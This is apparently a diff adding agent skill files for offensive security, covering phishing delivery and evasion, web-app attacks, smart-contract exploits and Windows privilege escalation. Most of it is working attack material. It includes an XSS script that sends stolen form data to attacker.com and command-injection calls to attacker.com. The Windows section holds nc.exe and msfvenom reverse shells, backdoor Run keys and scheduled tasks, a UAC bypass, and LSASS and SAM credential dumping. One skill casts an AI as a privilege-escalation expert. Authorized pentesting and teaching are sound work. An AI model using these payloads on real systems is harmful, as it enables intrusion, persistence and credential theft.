## Payload Delivery Methods
**Links:**
- Shortened URLs (bit.ly, tinyurl)
- Typosquatting domains
- Homograph attacks (IDN homograph)
- URL obfuscation
**Attachments:**
- Office documents with macros (.docm, .xlsm)
- PDFs with exploits/JavaScript
- Compressed files (.zip, .rar)
- ISO/IMG files
- LNK files (shortcut tricks)
**Advanced:**
- HTML smuggling
- Polyglot files
- Password-protected archives (bypass AV)
- Signed malware (stolen/fake certificates)
## Tracking and Reporting
**Email Tracking:**
```html
<!-- Invisible tracking pixel -->
<img src="http://attacker.com/track?id=USER123" width="1" height="1" style="display:none">
```
**Link Tracking:**
```bash
# Unique URL per target
http://attacker.com/click?id=USER123
# Log access in server
```
**Metrics to Track:**
- Emails sent
- Emails opened (tracking pixel)
- Links clicked
- Credentials submitted
- Attachments opened
- Time to first click/submission
## OpSec Considerations
**Infrastructure:**
- Use disposable domains
- HTTPS for credential harvesting
- Legitimate SSL certificates (Let's Encrypt)
- Categorize domains (submit to categorization services)
- CDN for hosting (CloudFlare)
**Email:**
- SPF/DKIM/DMARC alignment
- Warm up email reputation
- Similar but different domains (company.com vs company-portal.com)
- Avoid spam trigger words
**Detection Avoidance:**
- Realistic sender names and addresses
- Professional email content
- Avoid known malicious indicators
- Time-based delivery (business hours)
- Geofencing (target geography only)
## Tools Summary
- **Gophish** - Phishing campaign management
- **SET** - Social Engineering Toolkit
- **BeEF** - Browser exploitation
- **King Phisher** - Phishing campaign toolkit
- **Evilginx2** - MITM phishing proxy (bypass 2FA)
- **Modlishka** - Reverse proxy phishing
- **CredSniper** - 2FA token capture
- **ShellPhish** - Automated phishing
## Defensive Awareness
Teach users to recognize:
- Urgency/pressure tactics
- Requests for credentials
- Unusual senders
- Suspicious links/attachments
- Too-good-to-be-true offers
- Requests to bypass security
## Legal and Ethical Considerations
- **Always have written authorization**
- Define scope clearly
- Protect harvested data
- Follow ROE (Rules of Engagement)
- Report findings responsibly
- Delete data after engagement
## References
- https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
- https://getgophish.com/
- https://github.com/trustedsec/social-engineer-toolkit
- https://www.social-engineer.org/

358
skills/web-app-security/SKILL.md Normal file
View File

@@ -0,0 +1,358 @@
---
name: testing-web-applications
description: Test web applications for security vulnerabilities including SQLi, XSS, command injection, JWT attacks, SSRF, file uploads, XXE, and API flaws. Use when pentesting web apps, analyzing authentication, or exploiting OWASP Top 10 vulnerabilities.
---
# Testing Web Applications
## When to Use
- Pentesting web applications
- Testing authentication/authorization
- Exploiting injection vulnerabilities
- Analyzing JWT/session security
- Testing file upload functionality
- API security assessment
## SQL Injection
**Quick Detection:**
```bash
# Test basic payloads
'
"
`
' OR '1'='1
" OR "1"="1
' OR '1'='1'--
```
**Union-Based SQLi:**
```bash
# Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# Extract data
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
' UNION SELECT NULL,username,password FROM users--
```
**Time-Based Blind:**
```sql
-- MySQL
' AND SLEEP(5)--
-- PostgreSQL
' AND pg_sleep(5)--
-- MSSQL
' WAITFOR DELAY '0:0:5'--
```
**Automated Testing:**
```bash
# SQLMap
sqlmap -u "http://target.com/page?id=1" --batch --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
sqlmap -r request.txt -p parameter_name
```
## Cross-Site Scripting (XSS)
**Quick Payloads:**
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
```
**Filter Bypasses:**
```html
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<svg/onload=alert(1)>
<img src=x onerror="alert(1)">
```
**Steal Credentials:**
```html
<script>
document.forms[0].onsubmit = function(){
fetch('http://attacker.com?'+new URLSearchParams(new FormData(this)));
};
</script>
```
**Tools:**
```bash
dalfox url http://target.com/search?q=test
XSStrike -u "http://target.com/search?q=test"
```
## Command Injection
**Basic Operators:**
```bash
;whoami
|whoami
||whoami
&whoami
&&whoami
`whoami`
$(whoami)
%0Awhoami # Newline (best)
```
**Blind Detection:**
```bash
& sleep 10 &
& nslookup attacker.com &
& curl http://attacker.com &
```
**Common Parameters:**
```
?cmd=, ?exec=, ?command=, ?ping=, ?query=, ?code=, ?do=
```
## JWT Attacks
**Quick Testing:**
```bash
# jwt_tool - run all tests
python3 jwt_tool.py -M at -t "https://api.target.com/endpoint" -rh "Authorization: Bearer TOKEN"
# Specific attacks
python3 jwt_tool.py TOKEN -X a # Algorithm confusion
python3 jwt_tool.py TOKEN -X n # None algorithm
python3 jwt_tool.py TOKEN -X k # Key confusion RS256->HS256
```
**Manual Testing:**
```bash
# Decode JWT
echo "eyJhbGc..." | base64 -d
# Change algorithm to "none"
{"alg":"none","typ":"JWT"}
# Brute force secret
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
```
## SSRF (Server-Side Request Forgery)
**Basic Payloads:**
```bash
http://127.0.0.1
http://localhost
http://169.254.169.254/ # AWS metadata
http://[::1] # IPv6 localhost
```
**Cloud Metadata:**
```bash
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
```
**Bypasses:**
```bash
http://2130706433/ # Decimal
http://0x7f000001/ # Hex
http://127.1/ # Short form
http://127.0.0.1.nip.io
```
## File Upload
**Bypass Extensions:**
```bash
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
shell.phP
shell.php5
shell.phtml
```
**Magic Bytes:**
```php
GIF89a<?php system($_GET['cmd']); ?>
```
**Simple Web Shells:**
```php
<?php system($_GET['cmd']); ?>
<?=`$_GET[0]`?>
<?php passthru($_GET['cmd']); ?>
```
## XXE (XML External Entity)
**Basic XXE:**
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
```
**Out-of-Band XXE:**
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root>
```
**SVG XXE:**
```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
```
## LFI/RFI (Local/Remote File Inclusion)
**Path Traversal:**
```bash
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd
```
**Common Targets (Linux):**
```bash
/etc/passwd
/etc/shadow
/var/log/apache2/access.log
/var/www/html/config.php
~/.ssh/id_rsa
~/.bash_history
```
**Common Targets (Windows):**
```bash
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\xampp\apache\conf\httpd.conf
```
**PHP Wrappers:**
```bash
php://filter/convert.base64-encode/resource=index.php
php://input # POST: <?php system('whoami'); ?>
data://text/plain,<?php system('whoami'); ?>
expect://whoami
```
**Log Poisoning:**
```bash
# Poison Apache log
curl "http://target.com/<?php system(\$_GET['cmd']); ?>"
# Include log
http://target.com/page.php?file=/var/log/apache2/access.log&cmd=whoami
```
## API Testing
**Common API Paths:**
```bash
/api/v1/
/api/v2/
/graphql
/swagger.json
/api-docs
```
**IDOR Testing:**
```bash
# Change IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/2 -H "Authorization: Bearer USER1_TOKEN"
```
**Mass Assignment:**
```bash
# Add admin fields
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"username":"test","email":"test@test.com","role":"admin","is_admin":true}'
```
**GraphQL Introspection:**
```graphql
{
__schema {
types {
name
fields {
name
}
}
}
}
```
## Tools
**Enumeration:**
```bash
ffuf -u http://target.com/FUZZ -w wordlist.txt
gobuster dir -u http://target.com -w wordlist.txt
feroxbuster -u http://target.com -w wordlist.txt
```
**Vulnerability Scanning:**
```bash
nikto -h http://target.com
nuclei -u http://target.com -t ~/nuclei-templates/
```
**Parameter Discovery:**
```bash
arjun -u http://target.com/page
paramspider -d target.com
```
## Quick Reference
**Start Testing:**
1. Run directory enumeration (ffuf/gobuster)
2. Check for SQLi in parameters (`'`, `"`, `OR 1=1`)
3. Test XSS in inputs (`<script>alert(1)</script>`)
4. Analyze JWT tokens if present (jwt_tool)
5. Check file uploads (bypass filters, upload shell)
6. Test API endpoints (IDOR, mass assignment)
7. Look for command injection (`;whoami`, `|id`)
**Most Common Wins:**
- SQLi in search/filter parameters
- XSS in unescaped user inputs
- IDOR in API `/users/{id}` endpoints
- Weak JWT secrets (brute force)
- File upload bypasses
- Command injection in system utilities
## References
See HackTricks for detailed techniques:
- https://book.hacktricks.xyz/pentesting-web
- https://portswigger.net/web-security
- https://owasp.org/www-project-web-security-testing-guide/

563
skills/web3-blockchain/SKILL.md Normal file
View File

@@ -0,0 +1,563 @@
---
name: exploiting-web3-smart-contracts
description: Audit and exploit smart contracts and Web3 applications including reentrancy, integer overflow, access control flaws, and DeFi-specific vulnerabilities. Use when testing blockchain applications or performing smart contract audits.
---
# Exploiting Web3 and Smart Contracts
## When to Use
- Smart contract security auditing
- DeFi protocol testing
- Web3 application pentesting
- Blockchain vulnerability assessment
- NFT platform security
## Environment Setup
**Install Tools:**
```bash
# Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
sudo apt install -y nodejs
# Hardhat (Ethereum development)
npm install --save-dev hardhat
# Foundry (Rust-based toolkit)
curl -L https://foundry.paradigm.xyz | bash
foundryup
# Slither (static analysis)
pip3 install slither-analyzer
# Mythril (security analysis)
pip3 install mythril
```
**Connect to Networks:**
```javascript
// Ethereum Mainnet via Infura
const Web3 = require('web3');
const web3 = new Web3('https://mainnet.infura.io/v3/YOUR_KEY');
// Local development (Hardhat/Ganache)
const web3 = new Web3('http://127.0.0.1:8545');
```
## Common Smart Contract Vulnerabilities
### 1. Reentrancy
**Vulnerable Contract:**
```solidity
contract Vulnerable {
mapping(address => uint) public balances;
function withdraw() public {
uint amount = balances[msg.sender];
// Vulnerable: external call before state update
(bool success,) = msg.sender.call{value: amount}("");
require(success);
balances[msg.sender] = 0; // State update after call
}
}
```
**Exploit:**
```solidity
contract Attack {
Vulnerable victim;
constructor(address _victim) {
victim = Vulnerable(_victim);
}
function attack() public payable {
victim.deposit{value: 1 ether}();
victim.withdraw();
}
fallback() external payable {
if (address(victim).balance >= 1 ether) {
victim.withdraw(); // Reenter
}
}
}
```
**Prevention:**
- Checks-Effects-Interactions pattern
- ReentrancyGuard modifier
- Use transfer() instead of call()
### 2. Integer Overflow/Underflow
**Vulnerable (Solidity < 0.8.0):**
```solidity
function transfer(address _to, uint256 _value) public {
require(balances[msg.sender] - _value >= 0); // Can underflow
balances[msg.sender] -= _value;
balances[_to] += _value; // Can overflow
}
```
**Exploit:**
```solidity
// Send more tokens than you have
// balances[msg.sender] = 1
// _value = 2
// 1 - 2 = 2^256 - 1 (underflow)
```
**Prevention:**
- Use Solidity >= 0.8.0 (automatic checks)
- Use SafeMath library
- Manual overflow checks
### 3. Access Control Issues
**Vulnerable:**
```solidity
function withdraw() public {
// Missing access control!
msg.sender.transfer(address(this).balance);
}
function setOwner(address _owner) public {
owner = _owner; // Anyone can become owner
}
```
**Exploit:**
```javascript
// Call withdraw from any address
await contract.withdraw();
// Become owner
await contract.setOwner(attackerAddress);
```
**Prevention:**
```solidity
modifier onlyOwner() {
require(msg.sender == owner, "Not owner");
_;
}
function withdraw() public onlyOwner {
msg.sender.transfer(address(this).balance);
}
```
### 4. Unchecked External Calls
**Vulnerable:**
```solidity
function callExternal(address target) public {
target.call(""); // Return value not checked
}
function sendEther(address payable recipient) public {
recipient.send(1 ether); // Silently fails if send() returns false
}
```
**Prevention:**
```solidity
(bool success,) = target.call("");
require(success, "Call failed");
```
### 5. Delegatecall Injection
**Vulnerable:**
```solidity
function forward(address _target, bytes memory _data) public {
_target.delegatecall(_data); // Executes in contract's context
}
```
**Exploit:**
```solidity
// Attacker can modify contract storage
// Call selfdestruct()
// Change owner
```
**Prevention:**
- Avoid delegatecall to user-controlled addresses
- Whitelist allowed targets
- Use libraries instead
### 6. Front-Running / MEV
**Scenario:**
```solidity
// DEX swap at specific price
function swap(uint256 amountIn) public {
uint256 amountOut = getAmountOut(amountIn);
// Attacker sees this in mempool
// Submits transaction with higher gas to execute first
// Changes the price before victim's tx
}
```
**MEV Attacks:**
- Front-running
- Back-running
- Sandwich attacks
- Liquidations
- Arbitrage
**Mitigation:**
- Commit-reveal schemes
- Private mempools (Flashbots)
- Slippage protection
- Minimal on-chain disclosure
### 7. Price Oracle Manipulation
**Vulnerable:**
```solidity
// Using single DEX as price source
function getPrice() public view returns (uint256) {
return uniswapPair.getReserves();
}
```
**Exploit:**
```solidity
// Flash loan attack
// 1. Borrow large amount
// 2. Manipulate DEX price
// 3. Interact with vulnerable contract
// 4. Repay flash loan
// 5. Profit
```
**Prevention:**
- Use time-weighted average price (TWAP)
- Multiple oracle sources (Chainlink)
- Delay price updates
- Min/max price bounds
### 8. Denial of Service
**Vulnerable:**
```solidity
function distribute() public {
for (uint i = 0; i < users.length; i++) {
users[i].transfer(amount); // Can run out of gas
}
}
function withdraw() public {
// Winner takes all
require(msg.sender == topBidder);
msg.sender.transfer(address(this).balance);
}
```
**Exploit:**
- Create contract that rejects ether (reverts in fallback)
- Become topBidder
- Prevent anyone from winning
**Prevention:**
- Pull over push pattern
- Gas limits
- Emergency stop mechanisms
## Auditing Tools
### Static Analysis
**Slither:**
```bash
# Analyze contract
slither contract.sol
# Specific detectors
slither contract.sol --detect reentrancy-eth,tx-origin
# Generate report
slither contract.sol --json output.json
# Common detectors:
# - reentrancy-eth
# - uninitialized-state
# - tx-origin
# - unchecked-transfer
# - arbitrary-send
```
**Mythril:**
```bash
# Analyze with Mythril
myth analyze contract.sol
# Specify contract
myth analyze contract.sol:ContractName
# Graph generation
myth analyze contract.sol --graph output.html
```
**Securify:**
```bash
# Online tool
# https://securify.chainsecurity.com/
```
### Dynamic Analysis
**Echidna (Fuzzer):**
```bash
# Install
docker pull trailofbits/echidna
# Run fuzzer
echidna-test contract.sol --contract ContractName
```
**Manticore (Symbolic Execution):**
```bash
# Install
pip3 install manticore
# Analyze
manticore contract.sol
```
### Testing Frameworks
**Hardhat:**
```javascript
const { expect } = require("chai");
describe("Token", function () {
it("Should exploit reentrancy", async function () {
const [owner, attacker] = await ethers.getSigners();
const Vulnerable = await ethers.getContractFactory("Vulnerable");
const vulnerable = await Vulnerable.deploy();
const Attack = await ethers.getContractFactory("Attack");
const attack = await Attack.deploy(vulnerable.address);
// Exploit
await attack.attack({ value: ethers.utils.parseEther("1.0") });
// Verify
expect(await ethers.provider.getBalance(vulnerable.address)).to.equal(0);
});
});
```
**Foundry:**
```solidity
// test/Exploit.t.sol
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../src/Vulnerable.sol";
contract ExploitTest is Test {
Vulnerable public vulnerable;
function setUp() public {
vulnerable = new Vulnerable();
}
function testExploit() public {
// Test exploit
}
}
```
```bash
# Run tests
forge test
forge test --match-contract ExploitTest -vvv
```
## DeFi-Specific Attacks
### Flash Loan Attack
```solidity
interface IFlashLoan {
function flashLoan(uint256 amount) external;
}
contract FlashLoanExploit {
function exploit() external {
// 1. Borrow flash loan
IFlashLoan(lender).flashLoan(1000000 ether);
}
function executeOperation(uint256 amount) external {
// 2. Manipulate price oracle
// 3. Exploit vulnerable contract
// 4. Repay flash loan + fee
// 5. Keep profit
}
}
```
### Impermanent Loss Exploitation
- Manipulate pool ratios
- Extract value from liquidity providers
- Arbitrage price differences
### Governance Attacks
```solidity
// Flash loan to get voting power
// Vote on malicious proposal
// Execute immediately
// Repay loan
```
## Web3 Frontend Vulnerabilities
**Wallet Connection:**
```javascript
// Vulnerable: No signature verification
const signature = await signer.signMessage(message);
// Attacker can replay signature
// Secure: Include nonce and timestamp
const message = `Nonce: ${nonce}\nTimestamp: ${timestamp}`;
```
**Transaction Simulation:**
```javascript
// Before sending transaction
const result = await contract.callStatic.functionName(args);
// Verify expected outcome
```
## Blockchain Forensics
**Etherscan API:**
```bash
# Get contract source
curl "https://api.etherscan.io/api?module=contract&action=getsourcecode&address=0x..."
# Get transactions
curl "https://api.etherscan.io/api?module=account&action=txlist&address=0x..."
```
**Transaction Analysis:**
```javascript
// Get transaction
const tx = await web3.eth.getTransaction(txHash);
// Get receipt
const receipt = await web3.eth.getTransactionReceipt(txHash);
// Decode input data
const decoded = contract.interface.parseTransaction({ data: tx.input });
```
**Event Monitoring:**
```javascript
// Listen for events
contract.on("Transfer", (from, to, amount) => {
console.log(`Transfer: ${from} -> ${to}: ${amount}`);
});
// Past events
const events = await contract.queryFilter("Transfer", fromBlock, toBlock);
```
## NFT-Specific Vulnerabilities
**Metadata Manipulation:**
- Centralized metadata storage
- Mutable tokenURI
- IPFS pinning issues
**Minting Exploits:**
```solidity
// Reentrancy in minting
function mint() external payable {
require(msg.value == price);
(bool success,) = owner.call{value: msg.value}(""); // Vulnerable
_mint(msg.sender, tokenId++);
}
```
**Royalty Bypass:**
- Direct NFT transfers
- Bypassing marketplace fees
- Washing trades
## Testing on Mainnet Fork
**Hardhat:**
```javascript
// hardhat.config.js
module.exports = {
networks: {
hardhat: {
forking: {
url: "https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY",
blockNumber: 14000000
}
}
}
};
```
**Foundry:**
```bash
# Fork mainnet
forge test --fork-url https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY
# Specific block
forge test --fork-url https://... --fork-block-number 14000000
```
## Tools Summary
**Analysis:**
- Slither - Static analyzer
- Mythril - Security scanner
- Manticore - Symbolic execution
- Echidna - Fuzzer
**Development:**
- Hardhat - Development environment
- Foundry - Rust-based toolkit
- Remix - Online IDE
- Truffle - Development framework
**Monitoring:**
- Etherscan - Block explorer
- Tenderly - Debugging platform
- OpenZeppelin Defender - Security monitoring
## Security Best Practices
1. **Use latest Solidity** (>= 0.8.0)
2. **Follow** Checks-Effects-Interactions pattern
3. **Limit** external calls
4. **Validate** all inputs
5. **Use** established libraries (OpenZeppelin)
6. **Implement** access control
7. **Add** emergency pause
8. **Get** professional audits
9. **Use** testnets extensively
10. **Monitor** contracts post-deployment
## References
- https://book.hacktricks.xyz/blockchain
- https://consensys.github.io/smart-contract-best-practices/
- https://github.com/crytic/building-secure-contracts
- https://github.com/OpenZeppelin/openzeppelin-contracts
- https://ethernaut.openzeppelin.com/ (CTF)

492
skills/windows-privilege-escalation/SKILL.md Normal file
View File

@@ -0,0 +1,492 @@
---
name: escalating-windows-privileges
description: Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
---
# Windows Privilege Escalation Skill
You are a Windows security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
- Escalating privileges on Windows systems
- Exploiting Windows misconfigurations
- Service exploitation and DLL hijacking
- Token manipulation and impersonation
- Registry exploitation
- UAC bypass techniques
- Scheduled task abuse
- Windows credential dumping
## Core Methodologies
### 1. Initial System Enumeration
**System Information:**
```cmd
# Basic system info
systeminfo
hostname
whoami /all
ver
wmic os get Caption,CSDVersion,OSArchitecture,Version
# Users and groups
net user
net user <username>
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups
```
**PowerShell Enumeration:**
```powershell
# System info
Get-ComputerInfo
Get-HotFix # Installed patches
Get-Service # Running services
# Current user privileges
$env:username
[Security.Principal.WindowsIdentity]::GetCurrent()
```
**Network Information:**
```cmd
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
```
### 2. Service Exploitation
**Enumerate Services:**
```cmd
# List services
sc query
sc query state= all
wmic service list brief
Get-Service
# Detailed service info
sc qc <service_name>
sc query <service_name>
# Service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% *
```
**Unquoted Service Paths:**
```cmd
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# PowerShell
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select Name,PathName,StartMode
# Exploit: Place malicious executable in path with spaces
# Example path: C:\Program Files\My Service\service.exe
# Create: C:\Program.exe (will execute before actual service)
```
**Weak Service Permissions:**
```cmd
# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
# Modify service binary path
sc config <service> binpath= "C:\Windows\Temp\nc.exe -nv 10.10.10.10 4444 -e cmd.exe"
sc stop <service>
sc start <service>
# Change service to run as SYSTEM
sc config <service> obj= "LocalSystem" password= ""
```
**Service Binary Hijacking:**
```cmd
# If you can replace service binary
# Create malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evil.exe
# Replace original binary (if writable)
move C:\Path\To\Service\original.exe original.exe.bak
copy evil.exe C:\Path\To\Service\original.exe
# Restart service
sc stop <service>
sc start <service>
```
### 3. DLL Hijacking
**DLL Search Order:**
```
1. Application directory
2. System32 directory
3. System directory
4. Windows directory
5. Current directory
6. PATH directories
```
**Find DLL Hijacking Opportunities:**
```powershell
# Process Monitor (procmon) - filter for NAME NOT FOUND and path contains .dll
# Look for applications loading DLLs from writable directories
# PowerShell - find writable directories in PATH
$env:PATH -split ';' | ForEach-Object { if (Test-Path $_) { icacls $_ } }
```
**Create Malicious DLL:**
```cmd
# Generate DLL with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evil.dll
# Place in writable directory that application loads from
# Wait for service/application restart
```
### 4. Registry Exploitation
**Autorun Keys:**
```cmd
# Check autorun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
# PowerShell
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
# Modify if writable
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
**AlwaysInstallElevated:**
```cmd
# Check if both are set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both = 1, can install MSI as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > evil.msi
msiexec /quiet /qn /i C:\Temp\evil.msi
```
**Saved Credentials:**
```cmd
# Check for saved credentials
cmdkey /list
# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\Administrator "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
### 5. Token Manipulation
**Token Impersonation:**
```powershell
# Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
whoami /priv
# If enabled, use Potato exploits:
# - JuicyPotato (Windows 7-10, Server 2008-2016)
# - RoguePotato (Windows 10/Server 2019)
# - PrintSpoofer (Windows 10/Server 2016+)
```
**JuicyPotato:**
```cmd
# Requires SeImpersonate or SeAssignPrimaryToken
JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337 -a "/c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
# With specific CLSID
JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {CLSID}
```
**PrintSpoofer (Modern Windows):**
```cmd
# For Windows 10/Server 2016+
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
**GodPotato (Latest):**
```cmd
# For Windows Server 2012+, Windows 8+
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
### 6. UAC Bypass
**Check UAC Level:**
```cmd
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# ConsentPromptBehaviorAdmin = 0 (no UAC)
# ConsentPromptBehaviorAdmin = 5 (default UAC)
```
**UAC Bypass Techniques:**
```powershell
# fodhelper.exe bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
# Cleanup
Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force
# Disk Cleanup bypass (cleanmgr.exe)
# Event Viewer bypass (eventvwr.exe)
# Computer Management bypass (compmgmt.msc)
```
### 7. Scheduled Tasks
**Enumerate Tasks:**
```cmd
# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /v
# PowerShell
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}
```
**Exploit Writable Task Scripts:**
```cmd
# If task runs script you can modify
echo C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe > C:\Path\To\Task\script.bat
# Check task permissions
icacls C:\Path\To\Task\script.bat
```
**Create Malicious Task:**
```cmd
# Create task to run as SYSTEM
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc onstart /ru System
# Create task to run every minute
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc minute /mo 1 /ru System
```
### 8. Kernel Exploits
**Identify Windows Version:**
```cmd
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,CSDVersion,OSArchitecture,Version
```
**Check Installed Patches:**
```cmd
wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
**Common Windows Exploits:**
```cmd
# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7-10, Server 2008-2016)
# CVE-2021-1675 - PrintNightmare (Windows 7-11, Server 2008-2022)
# CVE-2021-36934 - HiveNightmare/SeriousSAM (Windows 10)
# Search exploits
searchsploit windows kernel | grep -i "privilege escalation"
```
**Windows Exploit Suggester:**
```bash
# On Linux
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt
```
### 9. Credential Access
**SAM/SYSTEM Dumping:**
```cmd
# Save registry hives (requires admin)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
reg save HKLM\SECURITY C:\Temp\security.hive
# Extract hashes (on Linux)
samdump2 system.hive sam.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL
# Volume Shadow Copy (requires admin)
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system
```
**LSASS Dumping:**
```cmd
# Task Manager method (GUI)
# Find lsass.exe -> Create Dump File
# procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll method
tasklist | findstr lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
# Parse dump with mimikatz (offline)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```
**Search for Passwords:**
```cmd
# Files containing password strings
findstr /si password *.txt *.xml *.ini *.config
findstr /si password C:\*.txt C:\*.xml C:\*.ini
# Unattend files
dir /s *unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# IIS web.config
type C:\inetpub\wwwroot\web.config
type C:\Windows\System32\inetsrv\config\applicationHost.config
# Saved credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
```
### 10. Group Policy Preferences (GPP)
**Search for GPP Files:**
```cmd
# Find GPP XML files containing passwords
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml
# Decrypt cpassword
gpp-decrypt <cpassword_value>
```
```powershell
# PowerShell
Get-GPPPassword
Get-CachedGPPPassword
```
## Automated Enumeration Tools
**WinPEAS:**
```cmd
# Download and run
winPEASx64.exe
winPEASx64.exe quiet
winPEASx64.exe systeminfo
```
**PowerUp (PowerSploit):**
```powershell
Import-Module .\PowerUp.ps1
Invoke-AllChecks
```
**Seatbelt:**
```cmd
Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user
```
